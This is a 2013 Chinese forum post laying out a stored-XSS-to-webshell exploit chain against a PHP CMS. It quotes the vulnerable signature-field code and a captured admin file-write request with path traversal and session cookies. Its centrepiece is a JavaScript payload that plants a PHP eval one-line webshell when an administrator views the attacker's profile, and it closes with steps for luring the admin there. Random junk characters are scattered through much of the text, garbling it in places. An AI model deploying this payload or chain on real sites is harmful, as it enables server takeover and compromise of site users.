|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
( O& @; r# }* O# E官网已经修补了,所以重新下了源码9 _3 v& q" }. g, I& o( O
因为 后台登入 还需要认证码 所以 注入就没看了。. W1 y4 c7 f+ ?
存在 xss- o8 H- x8 w. s9 w1 I
漏洞文件 user/member/skin_edit.php0 Z {. A) I( S: U x, m
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
( c; C2 q0 K1 i5 g
" J3 h7 Q1 \1 T/ x! B" R# ^& R</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>3 e' H5 z0 J( C: {3 ?* w' w- s* P
3 ?6 U+ x \5 ?7 {
</textarea></td></tr>
, }3 I( J, \' ]
1 `# T% P% K& u9 F+ z2 \ user/do.php
" R# O8 F; M; |) M
, W$ x5 Z( ~! q$ K$ e7 B9 d' Y0 N- b& v
if($op=='zl'){ //资料; {) b7 @, `! j+ t6 L* r2 X( [6 }
+ G- d) c( ^5 E* H) o
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
! @& V. Y8 Q$ l2 h+ t ?1 F/ h exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
* ?9 K- h5 u9 y8 G
" ]) b1 ^9 o# T+ F! ~* V1 c $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',3 z* i2 U R. T: j- H7 ?
/ a# d8 U; _8 I8 X' q, a# O CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
/ _3 i7 v( O" O: _ where CS_Name='".$cscms_name."'";
: d1 Z- }5 z8 R1 o- u* L8 j% M 5 r+ P% b; A R+ J3 f, B
if($db->query($sql)){
1 E/ M6 k8 J# F) {- z ; _# R) D; c; k+ G4 G
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));+ L4 k' u# Z5 j! K7 |3 F' W( M) g
. s& S" H& ?7 S' O: U6 b# q
}else{
Q$ W$ d0 M7 X. s' W" t1 d1 T/ k * u1 e+ N# l" L% b7 O7 R) Q
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));7 j# P7 H5 r: U) O0 N
; O. N; h$ e! v% Y$ L% {" a" L" f }5 }3 o+ ^4 Y2 R7 ]$ n4 y
; O. w6 c5 X) I" m
, d5 s' p; }: t- ]. {. M! h# g
没有 过滤导致xss产生。) a4 j+ ]1 [& f
后台 看了下 很奇葩的是可以写任意格式文件。。
! w% E2 q% [8 Q" e! T# x# ~抓包。。
. e; w8 H- s8 ~) t( Q, `( Z% _: r/ Y" Z) A! o/ H9 L3 D
5 n# r2 g' I3 p
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
, [+ \0 k2 @/ G' T+ ?+ O: S4 _ % K4 D, O) L+ M! X* I
Accept: text/html, application/xhtml+xml, */*
- @6 M: X+ x" z 1 M" D6 y$ X! a
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
. a G! X3 k `! E! o- ` 2 K- c! `, S5 I" K
Accept-Language: zh-CN+ x% X+ {. b8 x
0 I6 |. i* \( w; }! N! |User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)0 P) z! q# t, q y
3 U8 Q! o, W' u1 r* IContent-Type: application/x-www-form-urlencoded; E$ W5 a- ]# \4 f- A1 s, o
/ k+ `. R- f1 P* p5 ~( f' w) C
Accept-Encoding: gzip, deflate
9 N5 [1 \1 m5 ]$ U3 g $ C- k% J( a' y# `4 a
Host: 127.0.0.1" Q& C; ?# h- o' J
1 ~8 l$ i* T5 O1 Z
Content-Length: 38; Y) W8 W1 t$ `3 |$ u
+ U* u, l. U. V" l( B+ ]
DNT: 1% n8 U* u1 F" w% c& t5 Z6 K
5 t2 I+ d/ r0 R
Connection: Keep-Alive ]+ @' ^7 A7 C8 O
% z% V$ t5 T2 p" {( HCache-Control: no-cache
& D# c6 _( } L2 y+ { ' h; {/ a* @( o! M( ]/ r6 \2 ]( `
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
9 W) K5 X2 e$ \/ z& H , `5 M1 w# e) {
! b4 A6 i; R& w0 [* rname=aaa.php&content=%3Cs%3E%3Ca%25%3E4 \0 G. e# T% c0 y" x
5 k* e6 V0 `: ~8 O" e# i$ s/ U5 c6 |/ c, _# |0 m5 K
) s. `) S2 u6 P v6 Q; I" D3 X0 [% K
于是 构造js如下。
0 E% F' a+ x- v, U
$ f! `* e- S: S; v本帖隐藏的内容<script> 6 h0 h# C8 ^& g+ b! m e# u
thisTHost = top.location.hostname;4 p$ M. S x7 g2 H: | t& [3 v
* E3 l8 P) k# ^
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";/ Q0 \, f. K- w: p' P& q8 }& V9 n5 z+ I
3 {* e: d& L$ E# V* Wfunction PostSubmit(url, data, msg) {
" U% i m% \3 J8 u; G( \5 ]+ L5 w5 N var postUrl = url;$ \! r. v; @! }8 w+ a$ K
* Z- \' V R$ r$ S* M' v) u* c4 [
var postData = data; : K# w( | I3 s
var msgData = msg;
; g% e+ W. Y* O0 i/ ]3 ^& U. E var ExportForm = document.createElement("FORM"); ( _! A; V+ s7 k. V
document.body.appendChild(ExportForm);
( q, Y( U: U! { ExportForm.method = "POST";
( o* J( [6 M3 q var newElement = document.createElement("input"); 6 R' h, W' K6 W$ ?# N# D
newElement.setAttribute("name", "name"); 8 u9 M/ }( k1 N5 g- Z2 e! Q
newElement.setAttribute("type", "hidden"); $ p+ f# k9 b) c2 i/ m
var newElement2 = document.createElement("input");
% a( l# h1 Y" ^ newElement2.setAttribute("name", "content"); # V/ Y3 T5 @* p; ~1 [* _
newElement2.setAttribute("type", "hidden"); 8 O2 |9 K# [7 _( x7 {8 H
ExportForm.appendChild(newElement); + v$ |1 F8 `6 N4 v3 M0 y3 P
ExportForm.appendChild(newElement2); ( B# [( z- Z1 @& K5 @
newElement.value = postData; - ?0 z& }' _/ l1 {0 P: S: d6 _
newElement2.value = msgData; & ]$ n9 C# B* `6 K- C
ExportForm.action = postUrl; 3 g1 d% X; d* @9 Q$ ]; Q& c9 A! U
ExportForm.submit();
/ y' R5 j2 O9 Z: ?3 T8 e3 m& g3 B! G};
9 Q: f3 s C& R% @) n; e" K 8 ]4 g3 d3 q4 z. W- N: F
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");) W' x" e$ [( K t- l( A$ _
9 `; q% a- L( s$ m. V) m5 d7 q3 K" w</script>
. L* d3 ^# ~! P
' X S, J: q$ K, K' A6 ?1 A5 J9 Q3 j* ]6 v m( W' C; [
6 C$ W- U h: {& r& f' s, }http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入: d* `" R" u6 t, E- r
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)9 G) Q4 Y& D1 w: d9 m' v
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
$ Q9 x/ o, L1 {4 Q0 a |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对